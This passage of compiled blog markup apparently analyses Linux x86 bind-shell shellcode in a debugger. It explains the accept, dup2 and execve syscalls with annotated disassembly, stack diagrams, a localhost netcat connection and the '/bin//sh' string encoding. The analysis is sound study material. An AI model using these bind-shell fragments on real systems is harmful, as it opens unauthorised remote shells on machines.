parentName: \"blockquote\"\n }, \"The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer. The exact format of the address returned addr is determined by the socket\\u2019s address family (see \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n }), \"socket(2)\")), \" and the respective protocol man pages). When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.\"), mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"The addrlen argument is a value-result argument: the caller must initialize it to contain the size (in bytes) of the structure pointed to by addr; on return it will contain the actual size of the peer address.\"), mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"The returned address is truncated if the buffer provided is too small; in this case, addrlen will return a value greater than was supplied to the call.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \" Address Stack\\n +------------+\\n .... | .... |\\n +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef54 | 0x00000003 | \\u25C2\\u2014 socket file descriptor [0]\\n +------------+\\n \\u2014\\u25B8 0xbfffef58 | 0x00000000 | \\u25C2\\u2014 pointer point to sockaddr [1]\\n +------------+\\n 0xbfffef5c | 0x00000010 | \\u25C2\\u2014 pointer point to socklen_t [2]\\n +------------+\\n 0xbfffef60 | 0x5c110002 |\\n +------------+\\n 0xbfffef64 | 0x00000000 |\\n +------------+\\n .... | .... |\\n +------------+\"))), mdx(\"p\", null, \"Before calling syscall:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/4cc43a25ce535d2d227d21c863ce0cb1/d9199/2020-06-17_22-02.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"70.94594594594594%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADEUlEQVQ4y22TSXPbRhCFeUgp2LhINiUu4obBSoLAYCNBUqIoyhbpFGnLkeNcckrp4j+h4JCDgkMO+bOuZErzUiBtx459+Kq7Zmq6Xne/KSz06fyiN3qYHLfv3SMnDcp2elYkKS1Z6UV3lC61STrvxOlAVFNHIqkjf0RLHUXfn0nqbwNJ/V0XWl7huX3xcOuuMG8MEVX6GFWGiIo2gmIfcdn5RCibCHIkE75kICw5CCsuwqKNULEQKX0YYuddYeNf398OF1gdq+/nZZWdlU2WiD02FvZEZY1Rpcf8Up/FZYdNqkN2VqMsKBrME1RGRfIPFcnfVNRgfH/6a2EbvEh/cufYNOpsVSP82YnHE0XjsdjjY0nnUcnkUcXiYcnmgWzwoGjwsGRyX9a4J6qciiTn0Zd2Be8K571JutESbJoaWzcH/OrEw7hqITiyMHoSIXnqYX4aY3LswZN1eNIHFBO0PABVTE5l49FXTBhi+65gfddKf45v8GO4ZVt3zS/aMeJqE+NajOlJAlckcAQVrkBAJe0zdFDZyHNOJe3Rl3QYQuuuQI/U9M10iZtkzjbhjC96HpKTJibNBBf1KRKxh4mkIpQ1eCIBFckufsaXLfeFdhqWdLzyl+xaH/DRYQvJkyFCxYQvEgQ5EkH+wBO1/6nU4H1SqMEQTu8KjtBNN9YSt8GabZ1Lfl7LFXYQVYcIntL93D6o+Ya6rxXaB+30bbzFa/+avaIrvmgnSBoNJPURRtVoX0jSvkE+Q/3rGc67o/S1t8Zld8IuOzG/6hI+b6h5YR5XHO4KhFPFyDf5JYrFacn+ePffll8Gz+9/md0gUMz3cZmwN26dbYwW2w6X7BmZsrBssaGgMk8kzBPIzsy7fMc+3xub7I29ss8f3tIf4IsGRkUdL40O1l2C62aEq0ofZ4qBmaRjcmgjLhuID13Eio0w/36yuY+SgUg285bfFRb6eHmpJ39ZQufBkVvZolvLZs1mNmsMMyp1ssHBaTYU2pmjdLO+3M76Csn6YjezpF5my2pmi53MFtp/WEL7z95BPf4XPCZvuFupXegAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"sys_accept\",\n \"title\": \"sys_accept\",\n \"src\": \"/static/4cc43a25ce535d2d227d21c863ce0cb1/fcda8/2020-06-17_22-02.png\",\n \"srcSet\": [\"/static/4cc43a25ce535d2d227d21c863ce0cb1/12f09/2020-06-17_22-02.png 148w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/e4a3f/2020-06-17_22-02.png 295w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/fcda8/2020-06-17_22-02.png 590w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/efc66/2020-06-17_22-02.png 885w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/d9199/2020-06-17_22-02.png 960w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Hit \", mdx(\"kbd\", null, \"Enter\"), \" or \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"stepi\"), \" to step into system interrupt instruction, program will block and waiting for connection.\"), mdx(\"p\", null, \"Open another terminal, use netcat to establish a connection:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"nc\"), \" -v \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"127.0\"), \".0.1 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4444\")))), mdx(\"p\", null, \"In my case, the return value is 4 which represent newly created socket file descriptor.\"), mdx(\"h3\", null, \"Dup2() systemcall\"), mdx(\"p\", null, \"Assembly snippet 5:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \"0x0804a070 <+48>: xchg ebx,eax ; exchange two operands value, swap(eax, ebx), now ebx holds new file descriptor\\n0x0804a071 <+49>: pop ecx ; pop old socket descriptor out of stack to ecx\\n0x0804a072 <+50>: push 0x3f ; push 0x3f into stack\\n0x0804a074 <+52>: pop eax ; pop it to eax\\n0x0804a075 <+53>: int 0x80\\n\\n0x0804a077 <+55>: dec ecx ; decrement ecx\\n0x0804a078 <+56>: jns 0x804a072 ; jump short if sign flag is not zero\"))), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \" now holds 0x3f (63) represent syscall \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/en/man2/dup2.2.html\"\n }), \"dup2\")), \", so this time program is about to invoke dup2 syscall function.\"), mdx(\"p\", null, \"Definition:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"dup2\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" oldfd\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" newfd\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"On success, these system calls return the new descriptor. On error, -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"What \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"dup2\"), \" basically do is to create a copy of the old file descriptor \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"oldfd\"), \" using new file descriptor \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"newfd\"), \". After a successful return, the old and new file descriptors may be used interchangeably, refer to the same open file description, and thus share file offset and file status flags.\"), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" holds previous newly create file descriptor, however, in this case, it represents \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"oldfd\"), \" argument from dup2 function, while register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\"), \" holds old file descriptor and represents \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"newfd\"), \" argument.\"), mdx(\"p\", null, \"Before step in:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/31037dee688611bae42bc946d67afb56/d9199/2020-06-17_22-35.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"68.91891891891892%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADIElEQVQ4y3WSyW7jRhRFuQnE0aKt1ixZpDiIEimyOIrU1JZkqy1bjttI7Gybi+QjzE3gP0q0DJDfShol1AvIOEg7SC8ObuFV1cWt94paDWbJSolfpvXzZ682ztCplc3ZXuaJo2xxHmYrNcnW2jQb82pmsv3MYpXMypVTM5PXM5Mr6s8W238ZMtL31LW1evkO3cC8icDlDfBPTAh4AzxhBEHZhLBsQlS2wM9r3KDAZfVi3xft4rzHGxAJJlis8ju1dy+fH70dLEXrD/8bCQclCYe0jCNGxlFJwh6vYsTJGHE6DoQRDsUhntZsHJQN7NB9jBgFO4zyp8dqYNLSL9RDvM+e0Ar27Rbe1iTyoemSuaCRiJFJzCgkEg0SnuokEEckOBkR/8QgccUivjAgDqMQxCi5Yo/VwWSkA3VlrrKdMoFdQ8LbxoBcNlyI35ngiQMITz0Iz8awaAcwa3iAeB0cVgObVcHhdEBlC5Bg5Gvs80MwWeVA5Q1+Cr6Fp+ge39sfyKY3haTVgmnXg0lrCg6vg00r4DAqIPa/aIU6rIr9IqF8oNyKlj0Ea3iYrPGtPSfLrg/TTgeStgtxNYSQlsDjikuAmNz4f3k1lA4UqijZe8mBj+EKXxkh8U91CEQZfNGEULQgoiUI/zH8Cg77haEjaNndcAO3xgXeKjOybPoQN7owqVowrcaw4DSYMzK4+UVG+VpK/DrlA5V/2DvzEu7RFl8bK7JoxxDlhvUxXPSuIamGf6fLh8BpbxGMou5wGvY5A0y2f6B29jp7DPawlhO87WvkRpPIRkZkrcxIULEI4nWCOO0L9H9VGBb6xnDvbp4f/RvwhcHnTbdz3GvN45XsHbfq8hifWUen1D/atHp0aOVo0/2jXZLf4DBKzufXJ/9K3XlXP//g30JwYsC13IOPwy5sJQd2NQ1WogwrUYV1VYVFU4ek7sL7zgSSszEklTFM39ngc3rR3zBPyEi/URfDxFqq4Y8G2/sUt+vpoldNo5aazqRuGjbbqVvtpZNmLUVn3dSrm2ly7qRR207jLkonXScdsOepVup80unOT0qptfkLz6tzXSiSrtcAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"sys_dup2\",\n \"title\": \"sys_dup2\",\n \"src\": \"/static/31037dee688611bae42bc946d67afb56/fcda8/2020-06-17_22-35.png\",\n \"srcSet\": [\"/static/31037dee688611bae42bc946d67afb56/12f09/2020-06-17_22-35.png 148w\", \"/static/31037dee688611bae42bc946d67afb56/e4a3f/2020-06-17_22-35.png 295w\", \"/static/31037dee688611bae42bc946d67afb56/fcda8/2020-06-17_22-35.png 590w\", \"/static/31037dee688611bae42bc946d67afb56/efc66/2020-06-17_22-35.png 885w\", \"/static/31037dee688611bae42bc946d67afb56/d9199/2020-06-17_22-35.png 960w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"After step in, register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \" change to 3 which represent new file descriptor. Last two instruction stands for a loop, to invoke dup2 function three times, each time with the decremented value from register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\"), \" , each was \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"2 \\u2014\\u25B8 1 \\u2014\\u25B8 0\"), \", till register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\"), \" end up to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0xffffffff\"), \"; sign flag is set, hence loop is complete. Finally, proceed to the next instruction to snippet 6.\"), mdx(\"p\", null, \"In short, above loop translate to C code is:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"dup2\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"// 2 - standard error\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"dup2\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"// 1 - standard output\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"dup2\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"// 0 - standard input\")))), mdx(\"p\", null, \"Its purpose is to redirect \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"stderr\"), \", \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"stdout\"), \", \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"stdin\"), \" to socket file descriptor in order to construct an interactive interface for this socket connection.\"), mdx(\"h3\", null, \"Execve() system call\"), mdx(\"p\", null, \"Assembly snippet 6:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \"0x0804a07a <+58>: push 0x68732f2f ; stands for `//sh` in little endian format\\n0x0804a07f <+63>: push 0x6e69622f ; stands for `/bin` in little endian format\\n0x0804a084 <+68>: mov ebx,esp ; save stack pointer esp to ebx\\n0x0804a086 <+70>: push eax ; push 0x0 into stack\\n0x0804a087 <+71>: push ebx ; push 0x4 into stack\\n0x0804a088 <+72>: mov ecx,esp ; save stack pointer esp to ecx\\n0x0804a08a <+74>: mov al,0xb ; mov 0xb(11) to eax, number 11 is call sign of execve function\\n0x0804a08c <+76>: int 0x80\\n0x0804a08e <+78>: add BYTE PTR [eax],al\"))), mdx(\"p\", null, \"Use Python3 interpreter to get \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x68732f2f\"), \", \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x6e69622f\"), \":\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"python\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-python\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-python\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">>\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'//sh'\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"[\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \":\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \":\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"-\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"]\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'hs//'\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">>\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'hs//'\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \".\"), \"encode\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \".\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin\"\n }), \"hex\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'68732f2f'\"), \" \\u2014\\u25B8 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0x68732f2f\"), \"\\n\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">>\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'/bin'\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"[\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \":\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \":\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"-\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"]\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'nib/'\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">>\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'nib/'\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \".\"), \"encode\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \".\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin\"\n }), \"hex\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'6e69622f'\"), \" \\u2014\\u25B8 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0x6e69622f\")))), mdx(\"p\", null, \"Now, we know the program is intended to launch another program \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/bin//sh\"), \". Before system interrupt, register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \"\\u2019s content change to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0xb\"), \" which decimal number 11, so \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/en/man2/execve.2.html\"\n }), \"execve\"), \" is called.\"), mdx(\"p\", null, \"Synopsis:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"include\"), \" \", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token string\"\n }), \"\")), \"\\n\\n \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"execve\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"const\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"char\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"*\"), \"filename\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"char\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"*\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"const\"), \" argv\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"[\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"]\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \"\\n \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"char\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"*\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"const\"), \" envp\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"[\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"]\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n 